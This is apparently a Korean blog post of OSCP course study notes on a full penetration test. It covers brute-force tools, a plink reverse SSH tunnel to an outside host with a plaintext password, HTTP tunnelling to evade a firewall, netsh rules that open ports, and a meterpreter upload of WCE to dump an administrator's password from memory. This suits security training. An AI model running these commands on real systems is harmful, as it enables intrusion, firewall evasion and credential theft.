OSCP/OSCP Course PDF

18. Assembling the Pieces: Penetration Test Breakdown

우와해커 2020. 6. 2. 15:11

브루트포스

- 폼인증: hydra
- basic 인증: medusa

- DB 해시 값: John or hashcat

 

소프트웨어 버전 

searchsploit을 통해 exploit 코드 검색

  • 로그인 세션이 필요한 것일 수 있음, 이럴 경우에는 일부 코드 수정 필요

 

정보수집, 다른 네트워크 체크

root@adminsql:/tmp# cd /var/www/
root@adminsql:/var/www# ls -la
root@adminsql:/var/www# cd daaa118f0809caa929e0c0baae75d27a
root@adminsql:/var/www/daaa118f0809caa929e0c0baae75d27a# ls -la
root@adminsql:/var/www/daaa118f0809caa929e0c0baae75d27a# cat .htaccess
Order deny,allow
Deny from all
Allow from 10.7.0.0/255.255.255.0

root@adminsql:/tmp# cat /var/log/apache2/access.log |grep '10.7.0'
10.7.0.53 - -"GET /daaa118f0809caa929e0c0baae75d27a/ClockSigned.jar HTTP/1.1" 200

 

SSH 포트포워딩 

- 실패. 보안솔루션이 80포트(HTTP) 외 모든 포트를 차단하고 있는 상태

C:\Windows\temp>plink -l root -pw 23847sd98sdf987sf98732 -R 3389:127.0.0.1:3389
208.68.234.100

- 80포트 지정시 성공

C:\Windows\temp>plink -l root -pw 23847sd98sdf987sf98732 -R 3389:127.0.0.1:3389
208.68.234.100 -P 80

 

보안솔루션 우회

- HTTP로 Encapsulating하여 SSH 터널링을 시도할 것임

 

1. HTTP 터널링 프로그램 업로드 후 방화벽 예외처리 등록(3000포트) 
* 관리자 계정(권한)에서만 가능함

C:\Windows\temp> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:\Windows\temp> netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:\Windows\temp> netsh advfirewall firewall add rule name="1080" dir=in action=allow
protocol=TCP localport=1080
C:\Windows\temp> netsh advfirewall firewall add rule name="1079" dir=in action=allow
protocol=TCP localport=1079

C:\Windows\temp> httptunnel_client.exe

 

2. SSH Tunneling with HTTP Encapsulation

C:\Windows\Temp>plink -l root -pw 23847sd98sdf987sf98732 -R 3389:127.0.0.1:3389
127.0.0.1 -P 3000

 

WCE

관리자 권한 쉘 획득 후 WCE 업로드, 메모리에 있는 관리자 비밀번호 추출

 

meterpreter > getuid
Server username: CITRIX\Administrator
meterpreter > upload /var/www/wce_protected.exe c:\\Windows\\temp
meterpreter > shell
C:\Users\mike\Documents> wce_protected.exe –w

 

다음 과정에 대한 내용은 생략

- Kernel Exploit
- Client Side Attack
- AD Misconfiguration